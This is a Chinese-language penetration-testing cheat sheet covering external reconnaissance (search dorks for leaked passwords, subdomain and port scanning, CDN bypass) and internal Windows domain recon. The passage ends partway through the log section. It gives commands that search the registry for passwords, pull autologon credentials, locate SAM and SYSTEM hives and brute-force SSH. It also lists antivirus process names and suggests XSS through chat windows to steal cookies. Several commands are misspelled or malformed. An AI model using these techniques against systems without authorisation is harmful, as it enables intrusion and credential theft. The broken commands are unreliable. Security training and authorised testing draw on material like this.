【安服DD信集收藏版】一本信集与内网常用命令秘籍,臭哥哥们请查收~_~【小白必备】


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


      提前,祝贺大家七夕单身快乐... .../流下了伤心欲绝的眼泪

      整理这些散落在不同地方的经典文章与公众号的信息收集方法与内网常用命令,花费了个人比较多的精力,愿分享出来,与君共享,本文章涉及与未涉及的知识点,会长期进行维护...


目录

0x01 前期信息收集踩点

0x02 GitHub 信息收集

0x03 端口、邮箱、备案收集

0x04 Whois 查询

0x05 在线网站备案查询

0x06 查找真实IP

假设:如果目标网站使用了CDN,该如何找到真实IP?

0x07 指纹识别

0x08 非常规操作

0x09 SSL/TLS证书查询

0x10 OSINT调查平台工具

0x11 自动化批量漏扫工具刺探+手工挖掘

内网信息探测命令

0x01 基本信息

0x02 常用端口

0x03 域内信息收集

0x04 杀毒软件进程名字

0x05 获取系统安装的软件的信息

0x06 查看启动程序信息

0x07 获取系统注册的服务信息

0x08 收集本地用户和组信息

0x09 敏感信息查找

0x10 获取本地开放的端口与连接信息

0x11 防护墙配置

0x12 查询远程连接服务

0x13 工作组信息收集

0x14 其它

0x15 域凭据收集

Linux 信息收集

0x01 版本信息

0x02 用户和组

0x03 环境信息

0x04 进程信息

0x05 服务信息

0x06 计划任务

0x07 网络、路由和通信

0x08 已安装的程序

0x09 文件

0x10 公私钥信息

0x11 日志

0x12 常见配置文件


0x01 前期信息收集踩点

Googe Hacke 搜索

如需更多搜索引擎语法前往

https://blog.csdn.net/God_XiangYu/article/details/103145225

https://blog.csdn.net/God_XiangYu/article/details/100062233

https://securitytrails.com/blog/google-hacking-techniques

以下是利用GHDB结合搜索引擎高级指令进行敏感信息获取的对应表:

a b c 自动对词进行拆分匹配 拆分标准 空格
"a b c " 把a b c 当成一个整体去查
" a*b" *通配符 里面是一个或者多个 以a开头 b结尾
"ab" -c 找到ab 不包含c
a and b 包含a和b
"ab"(c|d) ab中可能包含c或者d
intitle: xx 找标题
intext: xx 找内容
inurl: *.baidu.com  模糊搜索地址
inurl:phpmyadmin/index.php & (intext:username & password & "Welcome to")  
inanchor:修改密码 锚点描述文本
filetype:pdf 搜索
cache:baidu.com 快照 历史信息
link:xxx.com 搜索所有链接有xxx.com 链接
site:*.baidu.com 搜索这个所有域名

related: xx.com

搜索相关网站

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

0x02 GitHub 信息收集

  • 数据库信息泄露
site:github.com  root password
site:github.com  sa password
site:github.com  User ID='sa';Password
  • svn信息泄露
site:github.com  svn
site:github.com  svn password
site:github.com  svn username
site:github.com  svn username password
  • 数据库备份文件
site:github.com  inurl:sql
  • 综合信息泄露
site:github.com  password
site:github.com  ftp ftppassword
site:github.com  密码
site:github.com  内部
  • Github 信息收集
https://github.com/michenriksen/gitrob
https://securitytrails.com/blog/github-dorks

 

 

0x03 端口、邮箱、备案收集

名称                                 地址或命令
Tag1-Nmap端口扫描 nmap -sS -T4 -Pn --open -n -p- -iL ***.txt -oX ***
小蓝本 https://www.xiaolanben.com/
ThreatScan https://scan.top15.cn/web/
邮箱收集 https://www.email-format.com/
奇怪域名收集 https://archive.org/web/
Aquatone  ---子域名截图 https://github.com/michenriksen/aquatone
Github 收集 "*.com" login
"*.com" ftp
"*.com" password
"*.com" token
图标hash搜索

1. 平台
2. 领英

3. 脉脉
4. 新媒体资产

5. 抓公众号、小程序链接,能发现一堆奇奇怪怪的资产;还有抖音,支付宝商号等等

Fuzz 资产存活,但却访问不了,是因为目录不正确,收集一个高命中率的资产字典进行fuzz
Hosts碰撞

https://github.com/r35tart/Hosts_scan

用于碰撞某些绑定了host的域名进行强制匹配进行访问,跟改了本地host文件一样

JS分析

网页的JS中往往存在着奇奇怪怪的URL,里面有些参数说不定也有,意想不到的接口泄露

推荐工具JSfinder

https://github.com/Threezh1/JSFinder

客服窗口

为什么此处会说客户窗口?说不定能弹个XSS,在打点的时候可以用此处知道客户的后台地址和Cookie

0x04 Whois 查询

通过whois来对域名信息进行查询,可以查到注册商、注册人、邮箱、DNS解析服务器、注册人联系电话等,因为有些网站信息查得到,有些网站信息查不到,所以推荐以下信息比较全的查询网站,直接输入目标站点即可查询到相关信息。

名称                                      地址
站长之家域名WHOIS信息查询地址 http://whois.chinaz.com/
爱站网域名WHOIS信息查询地址 https://whois.aizhan.com/
腾讯云域名WHOIS信息查询地址 https://whois.cloud.tencent.com/
美橙互联域名WHOIS信息查询地址 https://whois.cndns.com/
爱名网域名WHOIS信息查询地址

https://www.22.cn/domain/

易名网域名WHOIS信息查询地址 https://whois.ename.net/
中国万网域名WHOIS信息查询地址 https://whois.aliyun.com/
西部数码域名WHOIS信息查询地址 https://whois.west.cn/
新网域名WHOIS信息查询地址 http://whois.xinnet.com/domain/whois/index.jsp
纳网域名WHOIS信息查询地址 http://whois.nawang.cn/
中资源域名WHOIS信息查询地址 https://www.zzy.cn/domain/whois.html
三五互联域名WHOIS信息查询地址 https://cp.35.com/chinese/whois.php
新网互联域名WHOIS信息查询地址 http://www.dns.com.cn/show/domain/whois/index.do
国外WHOIS信息查询地址 https://who.is/

0x05 在线网站备案查询

名称                          地址
小蓝本 https://www.xiaolanben.com/
天眼查 https://www.tianyancha.com/
ICP备案查询网 http://www.beianbeian.com/
爱站备案查询 https://icp.aizhan.com
域名助手备案信息查询 http://cha.fute.com/index
企查查 https://www.qcc.com/

0x06 查找真实IP

      多地ping、nslookup、DNS 历史查询、查找子域名、反向连接、利用SSL证书寻找真实IP、国外解析域名、漏洞利用、目标敏感文件泄露、扫描全网、从 CDN 入手、利用HTTP标头寻找真实原始IP、利用网站返回的内容寻找真实原始IP、F5 LTM解码法

DNS解析与Whois 查询意义何在?
(1)DNS解析记录可以反查IP,比较早的解析记录有时可以查到真实IP,需要留意一下。
(2)注册人电话,注册人邮箱等社工信息可以钓鱼或者收集进字典来爆破目标办公系统。

为何需要手机子域名?
  收集子域名可以扩大测试范围,同一域名下的二级域名都属于目标范围。

  • 常用方式

    子域名中的常见资产类型一般包括办公系统,邮箱系统,论坛,商城等,其他管理系统,网站管理后台等较少出现在子域名中。
    首先找到目标站点,在官网中可能会找到相关资产(多为办公系统,邮箱系统等),关注一下页面底部,也许有管理后台等收获。
查找目标域名信息的方法:

名称

                          用法或地址

FOFA title="公司名称"
钟馗之眼 site=域名即可
百度 intitle=公司名称
Google intitle=公司名称
   
FOFA搜索子域名 https://fofa.so/
语法:domain=”baidu.com”
Hackertarget查询子域名 https://hackertarget.com/find-dns-host-records/
注意:查询子域名可以得到一个目标大概的ip段,接下来可以通过ip来收集信息。
站长之家,直接搜索名称或者网站域名 http://tool.chinaz.com/
钟馗之眼,直接搜索名称或网站名称 https://www.zoomeye.org/

 
第三方子域名查询

名称                                      地址
子域名在线查询 https://phpinfo.me/domain/
子域名在线查询 https://www.t1h2ua.cn/tools/
IP138查询子域名 https://site.ip138.com/baidu.com/domain.htm
Layer子域名挖掘机4.2 https://www.webshell.cc/6384.html
Layer子域名挖掘机5.0

https://pan.baidu.com/s/1wEP_Ysg4qsFbm_k1aoncpg

提取码:uk1j

SubDomainBrute https://github.com/lijiejie/subDomainsBrute
Sublist3r https://github.com/aboul3la/Sublist3r
   
   


 

端口检测

名称                                                                       地址
在线端口检测 http://coolaf.com/tool/port
扫描主机端口
nmap -T5 -A -v -p-
扫描一个IP段,探测存活主机 nmap -sP
探测操作系统类型
nmap -0
寻找登录授权页面
nmap -p 80 --script http-auth-finder
SSH爆破
nmap -p22 --script ssh-brute
dns 域传送漏洞
nmap -p 53 --script dns-zone-transfer.nse -v
Masscan Masscan 127.0.0.0/24 -p443 # 单端口扫描
Masscan Masscan 127.0.0.0/24 --top-ports 100 -rate 100000 # 快速扫描
Masscan Masscan 127.0.0.0/24 --top-ports 100 --excludefile exclude.txt # 排除指定目标
Masscan Masscan 127.0.0.0/24 -p20,21,22,23,80,161,443,873,2181,3389,6379,7001,8000,8009,8080,9000,9009,9090,9200,9300,10000,50070 > results.txt

 

假设:如果目标网站使用了CDN,该如何找到真实IP?

注意:很多时候,主站虽然是用了CDN,但子域名可能没有使用CDN,如果主站和子域名在一个ip段中,那么找到子域名的真实IP也是一种途径,而且说不定子域名IP的C段就存在主域名的真实IP。
1. 部分收集真实IP,请参考如下文章
     https://blog.csdn.net/God_XiangYu/article/details/106359936
2. phpinfo、旁站和C段

     如果目标网站存在phpinfo泄露等,可以在phpinfo中的SERVER_ADDR或_SERVER[“SERVER_ADDR”]找到真实IP。

     旁站往往存在业务功能站点,建议先收集已有IP的旁站,再探测C段,确认C段目标后,再在C段的基础上再收集一次旁站。
     旁站是和已知目标站点在同一服务器但不同端口的站点,通过以下方法搜索到旁站后,先访问一下确定是不是自己需要的站点信息。

     PS:不是所有C段都是该目标服务器的,可能只是某个范围是或切割多个范围才属于该目标范围的IP段,建议先收集已有IP的旁站,再探测C段,当然有些C段,你别傻不拉几的用Goby或漏扫直接扫,有些有WAF,你线程一大就封你IP,扫或不扫,根据现场测试业务环境决定。
 

3. 网络空间搜索引擎
如FOFA搜索旁站和C段
Nmap,Msscan扫描等
例如:
       nmap -p 80,443,8000,8080 -Pn 192.168.0.0/24

网络空间搜索引擎

如果想要在短时间内快速收集资产,那么利用网络空间搜索引擎是不错的选择,可以直观地看到旁站,端口,站点标题,IP等信息,点击列举出站点可以直接访问,以此来判断是否为自己需要的站点信息。FOFA的常用语法
1、同IP旁站:ip=”192.168.0.1”
2、C段:ip=”192.168.0.0/24”
3、子域名:domain=”baidu.com”
4、标题/关键字:title=”百度”
5、如果需要将结果缩小到某个城市的范围,那么可以拼接语句
       title="百度"&& region="Beijing"
6、特征:body=”百度”或header=”baidu”

扫描敏感目录/文件

扫描敏感目录需要强大的字典,需要平时积累,拥有强大的字典能够更高效地找出网站的管理后台,敏感文件常见的如.git文件泄露,.svn文件泄露,phpinfo泄露等,这一步一半交给各类扫描器就可以了,将目标站点输入到域名中,选择对应字典类型,就可以开始扫描了,十分方便
1、御剑
https://www.fujieace.com/hacker/tools/yujian.html
2、7kbstorm
https://github.com/7kbstorm/7kbscan-WebPathBrute
3、bbscan
https://github.com/lijiejie/BBScan
4、dirmap
https://github.com/H4ckForJob/dirmap
5、dirsearch
https://github.com/maurosoria/dirsearch
6、Github搜索

0x07 指纹识别

收集网站信息,对网站进行指纹识别,通过识别指纹,确定目标的cms及版本

   
云悉 http://www.yunsee.cn/info.html
潮汐指纹 http://finger.tidesec.net/
CMS指纹识别 http://whatweb.bugscaner.com/look/


0x08 非常规操作

1. 如果找到了目标的一处资产,但是对目标其他资产的收集无处下手时,可以查看一下该站点的body里是否有目标的特征,然后利用网络空间搜索引擎(如fofa等)对该特征进行搜索,如:body=”阿里XX”或body=”aliyun”等。
该方式一般适用于特征明显,资产数量较多的目标,并且很多时候效果不错

2. 通过上述方式的找到aliyun.com的特征后,再进行body的搜索,然后再搜索到aliyun.com的时候,此时fofa上显示的IP大概率为aliyun.com的真实IP。
3. 如果需要对政府网站作为目标,那么在批量获取网站首页的时候,可以用上如下地址来查询
     全国政府网站基本信息数据库

0x09 SSL/TLS证书查询

      SSL/TLS证书通常包含域名、子域名和邮件地址等信息,结合证书中的信息,可以更快速地定位到目标资产,获取到更多目标资产的相关信息。

名称 地址
亚洲诚信-SSL/TLS安全评估 https://myssl.com/

AUTO-EARN

https://github.com/Echocipher/AUTO-EARN

0x10 OSINT调查平台工具

 

名称 地址
iKy

https://kennbroorg.gitlab.io/ikyweb/

PS:电子邮件收集信息并以漂亮的可视界面显示结果的工具

Boardreader

https://boardreader.com/

PS:搜索全球各个论坛平台的内容。

blackhat线上会议 https://www.blackhat.com/us-20/briefings/schedule/
CTFR

https://github.com/UnaPibaGeek/ctfr

滥用证书透明度日志,允许在几秒钟内获取子域。

DNS 聚合器 https://dnsdumpster.com/

0x11 自动化批量漏扫工具刺探+手工挖掘

            网上有很多【Github】工具,此处就不介绍了,例如Goby+xray、AWVS等等


                                                                                             分割线


内网信息探测命令

0x01 基本信息

  • 获取主机名
hostname
echo %COMPUTERNAME%
  • 系统体系架构
echo %PROCESSOR_ARCHITECTURE%
  • 获取所属域信息
systeminfo

systeminfo /S 192.168.1.101 /U testlab\test /P "test"  查看远程机器的系统配置
  • 查看补丁信息
systeminfo/wmic qfe get caption,description,hotfixid,installedon
  • 获取环境变量
set
  • 获取IP地址(查看网络配置)
ipconfig /all
  • 查看安装软件的版本
wmic product >secbang.txt  # 使用wmic命令,把结果输出到txtGet-UnattendedInstallFile
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"
  • 获取当前用户名
whoami  或 echo %USERNAME%
whoami /all   # 查看当前用户权限
  • 查看注册表中的密码
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
  • 查看路由器信息
route print
  • 查看本地DNS缓存
ipconfig /displaydns
  • 跟踪本机出口ip
tracert 8.8.8.8
  • 查看ARP 缓存(查找有价值的内网arp通信记录)
arp -a
  • 查看是否连接到其它主机
netstat -ano
  • 查看hosts文件
C:\WINDOWS\System32\drivers\etc\hosts
  • 查看接口配置
netsh dump
  • 查看SNMP配置
reg query HKLM\SYSTEM\CurrentControlSet'Services\SNMP /s
  • 查看代理
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
  • 查看本机共享列表
net share,wmic share get name,path,status 

 

0x02 常用端口

端口号 端口说明 利用技巧
21/22/69 FTP/TFTP:文件传输协议 爆破、嗅探、文件传输
22 SSH:远程连接 爆破、SSH隧道内网转发、文件传输
23 Telnet:远程连接 爆破、嗅探
25 SMTP:邮件服务 邮件伪造
53 DNS:域名系统 DNS区域传输\DNS劫持\DNS缓存投毒\DNS欺骗\利用DNS隧道技术刺透防火墙
67/68 DHCP 劫持、欺骗
110 pop3 爆破
139 Samba 爆破、未授权访问、远程代码执行
143 IMAP 爆破
161 SNMP 爆破
389 LDAP 注入攻击、未授权访问
512/513/514 linux rexec服务 爆破、远程登录
873 rsync服务 未授权访问
1352 Lotus Domino邮件服务 爆破:弱口令、信息泄漏:源代码
1433 MSSQL 注入、SA弱口令爆破、提权
1521 Oracle 注入、TNS爆破
2049 NFS 配置不当
2181 ZooKeeper服务 未授权访问
3306 MySQL 注入、提权、爆破
3389 RDP 爆破、Shift后门、0708
4848 GlassFish控制台 爆破:控制台弱口令、认证绕过
5000 Sybase/DB2数据库 爆破、注入
5432 PostgreSQL 缓冲区溢出、注入、爆破:弱口令
5632 PcAnywhere服务 抓密码、代码执行
5900 VNC 爆破:弱口令、认证绕过
6379 Redis 未授权访问、爆破:弱口令
7001、7002 WebLogic控制台 Java反序列化、控制台弱口令+部署webshell
80/443 Web 常见web攻击、对应服务器版本漏洞
8080/8089 JBoss/Resin/Jetty/Jenkins 反序列化、控制台弱口令
8069 Zabbix 远程命令执行
9090 WebSphere控制台 爆破:控制台弱口令、Java反序列
9200/9300 Elasticsearch服务 远程代码执行
11211 Memcacache 未授权访问
27017、27018 MongoDB 爆破、未授权访问

0x03 域内信息收集

  • 通过查询系统详细信息来判断是否存在域
systeminfo|findstr "Domain"
systeminfo|findstr "域"
  • 查看指定用户在当前域中的详细属性信息
net user Agan /domain
  • 查看当前域中的所有用户名,根据用户名总数大概判断域的规模
net user /domain
  • 查看时间服务器,一般域控会做时间服务器
net time /domain
  • 查看域或工作组中的计算机列表(查看所有的域名称)
net view /domain
  • 查看指定域中在线的计算机列表
net view /domain:domain_name
  • 获取域分组
net group /domain
  • 查看当前域中的域管账户
net group "domain admins" /domain
  • 查看当前域中的所有的计算机名(登录过该域的计算机)
net group "domain computers" /domain
  • 查看域控
net group "domain controllers" /domain 
  • 查看域控机器名
nltest /DCLIST:域名  
  • 查看域控主机名
nslookup -type=SRV \_ladp._tcp 
  • 查看域控制器IP
dsquery server
  • 查看域控制器组
net group "Domain Controllers" /domain,netdom query pdc 
  • 查看域内信任关系
nltest /domain_trusts
  • 查看当前域的域内账户密码设置策略
net accounts /domain 
  • 查看看当前的登录域
net config workstation 
  • 查看当前域中在线的机器,不太直观,批处理把机器名对应的ip也显示出来
net view

----
WIN10下使用Net view会出现如下报错
System error 1231
System error 6118
解决:https://social.technet.microsoft.com/Forums/en-US/6f102ed1-8e76-4cb7-8dec-05714466d441/net-view-system-error-1231?forum=win10itpronetworking
----
  • ※【DC执行】导出域内DNS信息
dnscmd /zoneexport hack7.local dns.txt 
  • 查看域内邮件服务器
nslookup -q=mx agan1.local
  • 查看域内DNS服务器
nslookup -q=ns agan1.local 
  • 查看域内的主域控,仅限win2008及之后的系统
netdom query pdc
  • dsquery导出域信息
利用dsquery 工具搜集域内信息,域成员机器需要自己传上去

dsquery computer    # 查看当前域内的所有机器,dsquery工具一般在域控上才有,不过你可以上传一个dsquery
dsquery user        # 查看当前域中的所有账户名
dsquery group       # 查看当前域内的所有组名
dsquery subnet      # 查看到当前域所在的网段,结合nbtscan使用
dsquery site        # 查看域内所有的web站点
dsquery server      # 查看当前域中的服务器(一般结果只有域控的主机名)
dsquery user domainroot -name admin* -limit 240    # 查询前240个以admin开头的用户名
  • csvde导出域信息
拥有一个当前有效的域用户账户及密码时,使用如下命令
csvde.exe –f c:\windows\temp\e.csv –n –s 192.168.1.100(DC的IP) –b 域用户名 域名 域用户密码
如果拥有使用域成员主机的system权限或者当前就在DC上
csvde.exe –f c:\windows\temp\e.csv –n –s 192.168.1.100(DC的IP)
  • SPN扫描
setspn -T target.com -Q */*        可完整查出当前域内所有spn

setspn -T domain -q */*  # win自带命令完成扫描
或  
setspn  -Q  */* Find-PSServiceAccounts.ps1 # 发现包含弱密码的服务

PS:不同于常规的tcp/udp端口扫描,由于spn本质就是正常的Kerberos请求,
所以扫描是非常隐蔽,日前针对此类扫描的检测暂时也比较少。
大部分win系统默认已自带spn探测工具即:setspn.exe,此操作无需管理权限,需域内机器执行。

详细介绍:域安全-SPN扫描
         http://hackergu.com/kerberos-sec-spn-search/

其它一些脚本:https://github.com/PyroTek3/PowerShell-AD-Recon/
  • UDP扫描
sudo unicornscan -mU 192.168.2.100
# Linux下推荐使用,需要自己安装,也可用以端口扫秒
sudo unicornscan -mU 192.168.2.0/24
  • ICMP扫描
# CMD轻量级命令,对C段进行ping扫描
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.2.%I | findstr "TTL="

for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "ttl" 导出成文本: @for /l %i in (1,1,255) do @ping -n 1 -w 40 192.168.0.%i & if errorlevel 1 (echo 192.168.0.%i>>c:\a.txt) else (echo 192.168.0.%i >>c:\b.txt)

# powershell对目标内网进行icmp扫描
powershell.exe -exec bypass -Command "Import-Module C:\Invoke-TSPingSweep.ps1;Invoke-TSPingSweep -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -Port 21,22,23,25,53,80,81,82,83,84,85,86,87,88,89,110,111,143,389,443,445,873,1025,1433,1521,2601,3306,3389,3690,5432,5900,7001,8000,8080,8081,8082,8083,8084,8085,8086,8087,8089,9090,10000" 
  • ARP扫描
arp可以轻易bypass掉各类应用层防火墙,除非是专业的arp防火墙就不行了
# Linux下推荐使用,kali自带,通过端口转发或边界代理
sudo netdiscover -r 192.168.2.0/16 -i eth0 
# Windows下推荐使用,上传到目标主机
arp-scan.exe -t 192.168.2.0/24

arp-scan.exe下载地址:https://github.com/QbsuranAlang/arp-scan-windows

使用Empire的arpscan模块
usemodule situational_awareness/network/arpscan
set Range 192.168.2.0-192.168.2.254
execute
  • 扫描域内端口
如果能边界代理连接内网的话可以用msscan或nmap。
若目标PowerShell 3.0以上的版本,可以用Nishang的Invoke-PortScan模块
#主机发现、解析主机名
Invoke-PortScan -StartAddress 192.168.2.1 -EndAddress 192.168.2.255 -ResolveHost

#端口扫描,默认扫描常见端口可打开脚本查看,也可以用 -Port指定端口
Invoke-PortScan -StartAddress 192.168.2.1 -EndAddress 192.168.2.254 -ResolveHost -ScanPort
  • Nmap 扫描
Nmap -sP 192.168.1.0/24            # Nmap进行存活IP地址扫描Get-Webconfig
nmap -sS -sV -O -p0-65535 192.168.80.145 # 扫描内网单个主机端口 有的网络比较差
  • ldapsearch
详细介绍:渗透基础——活动目录信息的获取

https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-%E6%B4%BB%E5%8A%A8%E7%9B%AE%E5%BD%95%E4%BF%A1%E6%81%AF%E7%9A%84%E8%8E%B7%E5%8F%96/
  • Bloodhound/Sharphound

      BloodHound以用图与线的形式,将域内用户、计算机、组、Sessions、ACLs以及域内所有相关用户、组、计算机、登陆信息、访问控制策略之间的关系更直观的展现在Red Team面前进行更便捷的分析域内情况,更快速的在域内提升自己的权限。它也可以使Blue Team成员对己方网络系统进行更好的安全检测及保证域的安全性。 这里直接介绍需要在内网机器中执行的相关命令: 此工具的导出相对来说比较暴力,且目前此工具 exe 原版已经被识别并被各种杀软查杀,包括微软win10自带的杀软 Windows Defender 。

详细参考

  • 定位域控【查询dns解析记录】
若当前主机的dns为域内dns,可通过查询dns解析记录定位域控。
C:\Users\xingzheng>nslookup -type=all _ldap._tcp.dc._msdcs.hack7.local
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.86.109
_ldap._tcp.dc._msdcs.hack7.local        SRV service location:
          priority       = 0
          weight         = 100
          port           = 389
          svr hostname   = dc.hack7.local
dc.hack7.local  internet address = 192.168.86.109
  • 定位域控【SPN扫描】
在SPN扫描结果中可以通过如下内容,来进行域控的定位
CN=DC,OU=Domain Controllers,DC=hack7,DC=loca
  • 定位域控【net group】
C:\Users\xingzheng>net group "domain controllers" /domain
这项请求将在域 hack7.local 的域控制器处理。
组名     Domain Controllers
注释     域中所有域控制器
成员
-------------------------------------------------------------------------------
DC$
命令成功完成。
  • 定位域管理员
获取域内一个支点后需要获取域管理员权限。
域管理员有其它域成员主机的本地系统管理员权限,具备完全控制权。

推荐使用Empire的user_hunter模块
usemodule situational_awareness/network/powerview/user_hunter
execute
#可以清楚的看到哪个用户登录了哪个主机
  • 定位域控【端口识别】
端口:389
服务:LDAP、ILS
说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。
端口:53
服务:Domain Name Server(DNS)
说明:53端口为DNS(Domain Name Server,域名服务器)服务器所开放,
主要用于域名解析,DNS服务在NT系统中使用的最为广泛。
通过DNS服务器可以实现域名与IP地址之间的转换,只要记住域名就可以快速访问网站
  • 利用脚本信息收集
  1. GDA.bat下载地址

  2. PowerView.ps1下载地址 

 

0x04 杀毒软件进程名字

360SD.exe    360杀毒
360TRAY.exe  360实时保护
ZHUDONGFANGYU.exe  360 主动防御
KSAFETRAY.exe   金山卫士
SAFEDOGUPDATECENTER.exe    服务器安全狗
MCAFEE  MCSHIELD.exe     MCAFEE
EGULEXE              NoD32
AVP.exe              卡巴斯基
AVGUARD.exe            小红伞
BDAGENT.exe            BITDEFENDER
"avcenter.exe": "Avira(小红伞)",
"avguard.exe": "Avira(小红伞)",
"avgnt.exe": "Avira(小红伞)",
"sched.exe": "Avira(小红伞)",
"ashDisp.exe": "Avast网络安全",
"rtvscan.exe": "诺顿杀毒",
"ccapp.exe": "Symantec Norton",
"NPFMntor.exe": "Norton杀毒软件相关进程",
"ccSetMgr.exe": "赛门铁克",
"ccRegVfy.exe": "Norton杀毒软件自身完整性检查程序",
"vptray.exe": "Norton病毒防火墙-盾牌图标程序",
"ksafe.exe": "金山卫士",
"QQPCRTP.exe": "QQ电脑管家",
"Miner.exe": "流量矿石",
"AYAgent.exe": "韩国胶囊",
"patray.exe": "安博士",
"V3Svc.exe": "安博士V3",
"avgwdsvc.exe": "AVG杀毒",
"QUHLPSVC.exe": "QUICK HEAL杀毒",
"mssecess.exe": "微软杀毒",
"KSWebShield.exe": "金山网盾",
"rfwmain.exe": "瑞星防火墙",
"kpfwtray.exe": "金山网镖",
"BaiduSdSvc.exe": "百度杀毒-服务进程",
"BaiduSdTray.exe": "百度杀毒-托盘进程",
"BaiduSd.exe": "百度杀毒-主程序",
"SafeDogGuardCenter.exe": "安全狗",
"safedogupdatecenter.exe": "安全狗",
"safedogguardcenter.exe": "安全狗",
"SafeDogSiteIIS.exe": "安全狗",
"SafeDogTray.exe": "安全狗",
"SafeDogServerUI.exe": "安全狗",
"D_Safe_Manage.exe": "D盾",
"d_manage.exe": "D盾",
"yunsuo_agent_service.exe": "云锁",
"yunsuo_agent_daemon.exe": "云锁",
"hipstray.exe": "火绒",
"wsctrl.exe": "火绒",
"usysdiag.exe": "火绒",
"SPHINX.EXE": "SPHINX防火墙",
"bddownloader.exe": "百度卫士",
"baiduansvx.exe": "百度卫士-主进程",
"AvastUI.exe": "Avast!5主程序"

 

0x05 获取系统安装的软件的信息

  • 查看安装了什么软件
dir /a "C:\Program Files"
dir /a "C"\Program Files(x86)"
reg query HEKY_LOCAL_MACHIN\SOFTWARE
  • 有没有文件夹或文件权限配置错误,查看“Program Files”和“Program Files (x86)”下对“Everyone”和“Users”开放所有权限的文件夹
icals "C:\Program Files\*" 2>null | findstr "(F)" | findstr "Everyone"
icals "C:\Program Files(x86\*)" 2>null |findstr "(F)" | findstr "Everyone"
icals "C:\Program Files\*" 2>null | findstr "(F)" | findstr "BUILIN\Users"
icals "C:\Program Files(x86\*)" 2>null | findstr "(F)" |findstr "BUILIN\Users"
  • 查看“Program Files”和“Program Files (x86)”下对“Everyone”和“Users”开放修改权限的文件夹
icals "C:\Program Files\*" 2>null | findstr "(M)" | findstr "Everyone"
icals "C:\Program Files(x86\*)" 2>null |findstr "(M)" | findstr "Everyone"
icals "C:\Program Files\*" 2>null | findstr "(M)" | findstr "BUILIN\Users"
icals "C:\Program Files(x86\*)" 2>null | findstr "(M)" |findstr "BUILIN\Users"
  • 从Sysinternals上传accesschk来检查可写文件夹和文件
accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" *
  • 当前进程信息
tasklist
  • 获取系统补丁情况
wmic qfe list
  • 使用wmic来识别安装在系统中的补丁情况
wmic qfe get Caption,Description,HotFixID,InstalledOn
  • 查看系统体系结构
echo %PROCESSOR_ARCHITECTURE%
  • 安装软件版本信息
wmic product get name,version
wmic product get name /value
  • PowerShell命令,收集软件版本信息条具体如下
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version"
  • 查询本机服务信息
wmic service list brief
  • 查看补丁情况
wmic qfe get Caption,Description,HotFixID,InstalledOn 
systeminfo/wmic qfe get caption,description,hotfixid,installedon  # 查看补丁信息
  • 创建系统隐藏文件
ttrib +s +a +r +h filename / attrib +s +h filename

 

 

0x06 查看启动程序信息

  • 进程列表和进程用户,分析软件、邮件客户端、VPN和杀毒软件等进程
tasklist /v
  • 命令也可以查看进程信息
wmic process list brief
  • 执行如下命令查看启动程序信息
wmic startup get command,caption

 

 

0x07 获取系统注册的服务信息

  • 获取系统注册的服务信息
sc query state=all
  • 获取在线主机信息
net  view
  • 查看系统上正在运行的进程/服务有哪些,以及有没有暴露的内部服务
tasklist /svc
taskkill /v
net start
sc query
  • 注册表
reg
  • Registry 某些情况下可能会包含凭证
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
  • Windows 自动登陆
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
  • SNMP 相关参数
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"


0x08 收集本地用户和组信息

  • 获取本地用户组
net localgroup 
  • 获取本地用户
net user
  • 查当前机器中所有的组名,了解不同组的职能,如:IT,HR,admin,file
net localgroup
  • 查指定组中的成员列表
net localgroup administrators
  • 列举用户,查看是否有旧的用户配置文件没有清理
dir /b /ad "C:\Users\"
dir /b /ad "C:\Documents and Settings\" #Windows XP and below
  • 查看当前在线用户信息
query user || qwinsta
  • 查客户端会话信息
net session
  • 查询端口列表信息
netstat –ano
  • 查看是否有其它人登录
qwinsta
  • 查看注册表中跟用户自动登录有关的内容
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>null | findstr "DefaultUserName DefaultDomainName DefaultPassword"
  • 查看Credential Manager中的内容
cmdky /list
  • 确定是否可以访问SAM和SYSTEM文件
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

 

 

0x09 敏感信息查找

  • 查找有没有未清理的sysprep或无人值守的文件
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
  • 如果服务器是IIS网络服务器,那么inetpub中有什么?是否存在隐藏的目录或者web.config文件
dir /a C:\inetpub\
dir /s Web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
  • 查看日志
c:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log
c:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log
c:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log
c:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
  • 远程登录日志
c:\windows\system32\winevt\logs\*.remote*
  • 主机远程登录日志
HKCU\Software\Microsoft\Terminal Server Client\Servers
HKCU\Software\Microsoft\Terminal Server Client\Default
  • 服务器登录日志 登录事件ID 4624,可判别出登录域控制器的机器
C:\Windows\System32\winevt\Logs\Security.evtx
  • 日志与事件信息
wevtutil
  • 获取windows远程桌面 连接记录
cmdkey /list # 查看mstsc的连接纪录
  • 获取系统日志信息

两种方式:

1. 一种本地导出

copy C:\Windows\System32\winevt\Logs\System.evtx
